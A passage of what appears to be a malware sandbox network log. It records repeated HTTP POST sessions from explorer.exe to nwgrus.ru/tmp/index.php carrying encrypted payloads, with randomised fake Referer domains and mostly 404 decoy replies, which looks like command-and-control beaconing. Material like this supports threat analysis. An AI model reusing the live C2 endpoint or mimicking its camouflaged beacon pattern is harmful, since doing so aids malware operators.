                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              21192.168.2.849729187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:17.688922882 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://lgertcnwaskqpc.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 367
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:17.688955069 CEST367OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 7b 23 cc 91
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu{#fEi7`?-WFb%^Wq33]%DD/:5t~6!ON]CB>q.EvZ~tb_ 0cc>6
                                                                                                                                                              Sep 30, 2024 15:38:18.643527031 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:18 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              22192.168.2.849730187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:18.667552948 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://fevqsrdkflt.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 242
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:18.667552948 CEST242OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4d 59 e2 fe
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuMY2r][6We_]frMo[.]>RD(QveAG~3fV0PL'AeBchUnw8s;k=
                                                                                                                                                              Sep 30, 2024 15:38:19.630750895 CEST137INHTTP/1.1 200 OK
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:19 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              23192.168.2.849731187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:20.111666918 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://drnpfojnpvggv.org/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 198
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:20.111700058 CEST198OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 52 14 d2 8f
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuRVX%P`ayqe^*19tg(<UKUUFagf7>xCAw,E
                                                                                                                                                              Sep 30, 2024 15:38:21.247132063 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              24192.168.2.849732187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:21.268733025 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ibetbbesaakqkq.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 319
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:21.268760920 CEST319OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 4b 0e ff 8b
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuKuHeub[5[O,14mGl%JP@Xe\)8SY1P~&A.'mWqsT*W&FdVc:!UspM?#
                                                                                                                                                              Sep 30, 2024 15:38:22.218976021 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:22 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              25192.168.2.849733187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:22.228885889 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://tyqfkmhoepxpii.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 269
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:22.228909016 CEST269OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 2a 2d ae f4
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu*-C<-aTSq]/bn81GM=fzi\<a~-&q:;So(7r1@gu;5\r8^
                                                                                                                                                              Sep 30, 2024 15:38:23.187736034 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:23 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              26192.168.2.849734187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:23.843585968 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://wyjfuitjcdhsl.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 313
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:23.843626976 CEST313OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3c 09 c7 97
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vu<_ofu$@Fsy4NCptx]+;*k4JIEN%@f&1&P#QhbflO#2\}v*.Ax
                                                                                                                                                              Sep 30, 2024 15:38:24.807872057 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:24 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              27192.168.2.849735187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:24.816634893 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://ecpjrwjcauix.com/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 215
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:24.816654921 CEST215OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 64 58 fe b7
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vudXcW_GZK]x%:MaZl&@sES[eTgF.M7m833dBy8JL#
                                                                                                                                                              Sep 30, 2024 15:38:26.005872011 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:25 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              28192.168.2.849736187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:26.014683008 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://bxntarqqdjdvdpxp.net/
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                              Content-Length: 316
                                                                                                                                                              Host: nwgrus.ru
                                                                                                                                                              Sep 30, 2024 15:38:26.014754057 CEST316OUTData Raw: 3b 6e 22 64 8c bb 1c 54 df a9 c9 0b 02 01 08 b8 78 0a c8 94 69 04 e6 67 0d 75 0f e7 47 b0 b5 19 9c 5b c0 2b 76 69 22 6b 9d 9a 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 54 4e c7 fd
                                                                                                                                                              Data Ascii: ;n"dTxiguG[+vi"k?:5{J7 M@NA -[k,vuTNfihvbLd^=MGBRiiEK`I.F|W~4\X!Xsbbku?'0Mvzym^Jo6rl?U*
                                                                                                                                                              Sep 30, 2024 15:38:26.988398075 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                                              Server: nginx/1.26.0
                                                                                                                                                              Date: Mon, 30 Sep 2024 13:38:26 GMT
                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              29192.168.2.849737187.228.112.175804084C:\Windows\explorer.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Sep 30, 2024 15:38:26.998444080 CEST279OUTPOST /tmp/index.php HTTP/1.1
